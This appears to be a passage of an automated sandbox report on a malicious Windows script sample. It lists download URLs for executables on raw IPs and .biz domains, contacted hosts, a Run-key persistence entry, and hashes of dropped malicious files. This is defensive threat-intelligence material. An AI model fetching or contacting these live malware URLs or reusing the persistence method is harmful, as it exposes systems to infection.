                                                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138/e6alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              http://tbjrpv.biz/k7/pValg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/Halg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://44.221.84.105/1q6alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/1palg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        http://208.100.26.245/mralg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://44.221.84.105/1salg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            http://34.246.200.160/wneleRiU4alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              http://172.234.222.138:80/hmsaqgigfaxqleZalg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                http://47.129.31.212/xwfedwcvhvxkihaalg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  http://35.164.78.200/vekxopatbalg.exe, 00000010.00000003.2079470414.00000000005A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                    http://44.221.84.105/55alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                      http://dwrqljrr.biz/alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                                                                                                                                                                                                        165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        chichometextiles.comEuropean Union
                                                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                        6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                        34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                        43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                        18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis ID:1546600
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date and time:2024-11-01 08:22:10 +01:00
                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                        Overall analysis duration:0h 16m 57s
                                                                                                                                                                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:42
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                        Sample name:E_dekont.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23
                                                                                                                                                                                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Successful, ratio: 94%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Number of executed functions: 80
                                                                                                                                                                                                                                                                                                                                                                                                                        • Number of non-executed functions: 196
                                                                                                                                                                                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Found application associated with file extension: .cmd
                                                                                                                                                                                                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:23:14  API Interceptor  2x Sleep call for process: x.exe modified
03:23:22  API Interceptor  6908049x Sleep call for process: wdmvmswJ.pif modified
03:23:26  API Interceptor  178x Sleep call for process: alg.exe modified
03:23:31  API Interceptor  2x Sleep call for process: Jwsmvmdw.PIF modified
03:24:12  API Interceptor  199x Sleep call for process: msdtc.exe modified
03:27:08  API Interceptor  1x Sleep call for process: elevation_service.exe modified
08:23:22  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw C:\Users\Public\Jwsmvmdw.url
08:23:30  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw C:\Users\Public\Jwsmvmdw.url
                                                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324407502259225
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QC4VQjGARQNhiuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:QOCAR0iusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D5C0C7D2DCB23489A5454EDC7E34D517
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:309647F9BF2E0B1DCDA22487580E628FA67EBC48
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1CA9C074A79F643B5E7D5012F39EC5729098B697E1E5E0EC34003BAD1F597304
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2FC594135E446820D673244E9658CA78A6BBFD4B29FB579D7EC880BA55C08B3BB15DD9080772D642A5E8882A939ACD6620213182B2A6CE4CD59CB408D7BE1FBE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2827155334899345
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:cNUpaKghZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cCMKgPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:8980573B58A481BA498D890E54C24A16
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CDE6968F36E8992CD0F0911E56693F1ABBD40940
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E719C57DC4B07D7295DDEC4E7A60BA9E36A32BCF0A2E327D23BAE64389A27F2B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E083DACB5255295BECF68827EEF4A0B829D679BE06D0BDA12DEBB1D0CB19D1F543563C308FDE152D6974B96FD8AE51755CA88D7A394F9952E2112527A1A21A17
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2741627293299915
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:iMEhwdbTqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YKdHqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B0DD7DF5038F8C6DC09A09D0C94F1C3F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8E96674E65247B31BD8183FA3D032291C743399C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:320A28DF2F1A3F176EA9BF3F980DDF46E969DFDFCD031534ABA31513CFE2D60E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B2B25FDD09534AE7F0789505C3D8CD2E77C8BD2D4C57FC0323E4FA577AFF31533244EB88E373745548C0CE06AA803B79993C9AE9C717989AC1D9FE0D919DE1DC
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.647041040888853
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:nK0eqkSR7Xgo4TiRPnLWvJWDmg27RnWGj:nK0pR7Xn4TiRCvJWD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:78814380F69ADCE1C3DD57FD7D6BC2C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1CCE6FB42BEBB6B2A16368B66D80B81089094A87
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F1197038DB901243571367D7BF4A9DB9956DB47DE2E93C3BC5186E5083870074
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:98687D72F3D30BA058F56298600769D65F6F505FD19330FE2D7FC9C4272E10151DE92B76961739AEE787FF4C560CD5ACDE679DE7CC1D6968CEDD5A15EE2E080E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.565066785461434
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:vfYP1JsEDkSR7Xgo4TiRPnLWvJWDmg27RnWGj:HYPBR7Xn4TiRCvJWD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1E18565B229157AF5BFD920290385F02
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:12AD95BF9A41B488CC5BF2B271150BBB199F4BB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CD241B3E465910144A0BC9B18504C822E2C9F3436D778085CDA7C9EC556D9714
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB9972D29882D190924613F8BA2BC861B2ADF00C3D5D2F71FC9DADD2A5B464815B25D891E0099D84665EF4B226680B607DEA854CF8C3970DEA9EBC6E618C11B8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.123576065751528
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:962SYUcknnEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:aYUcknEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7E6B30A317E659887B9512B938CC5A76
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A7E012DE7C0A7E5AA94D1F5366ACFB5665227F8B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E66F0FF52BA23D6E4BCFC161F230B62BCBD56F383FCE33523DC1792EAABA795B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9D65EF0CBA934FF52A0FE7EFD3E982225EB3DFD545D0C9DFFB8EFE7F25DD7B0FB3BFA3A322586DD41D50A2C72E34A2F4401823A097A95382745F848F50025EA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166692503186719
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:L+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS6Dmg27RnWGj:JSktbpgD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1C5A1CC6E079685DC6A1EAE78036E4C0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AD2E04A8090BD89C8D45A2D0BF3EA96CFCF06414
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BCEF2CBAA643A361448C4024AB36A188359CBF1EA8FE15D304CBF4B4FF8224CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1908C7236FFD875787029E0E525D6D09E4BB63F1DBD7A22895F2171B3D5EB03CDB37F88FD39D0DCBA9E18E04826284F323C3AA1FAC740ED19CC83228233D0086
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.094637406788883
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:lGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLVDmg27RnWGj:54OEtwiICvYMRf1D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AC58C38487B9DB8AFFB13097CF4B9C6D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09FEBC1847AEAA5B9FF29A2ABE508AF3A22C086F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9EEDD67E1558338216215D5E8FD154DD2656F210E83746A7E6D7698079BB5DD6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:54B4A18ECC373C759D3AA8AB5C8B601F783B11DC393EA550F8B16E08ACED1E331C36F454FA26CA5BB8068E00ACBD0C53AF426317301FDD9AF760309320DD4595
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.496416077690878
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MAMuR+3kMbVjh+sqjnhMgeiCl7G0nehbGZpbD:VD+lbVjhSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A598CF03E34555DB0E519BBAED3C8B90
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:35F29E3D977A42BF2EFE368EFE413DF88CEC90AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC79FB8C51572ACB5DF434242C1F34F9983E460C6E615F032F53F25960F1C872
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E99D2D3876FE63088CBDD20771C8E4D2AA4EE297F8FFC47E95029ED341EBF86BFFA66AF55D99F4D32D50ED2E4FA4AA4FADE9DEDBC07F032F838417CF2B38B140
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.277787975141009
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1644544
Entropy (8bit):5.694825890303236
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1781760
Entropy (8bit):7.279696391988148
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
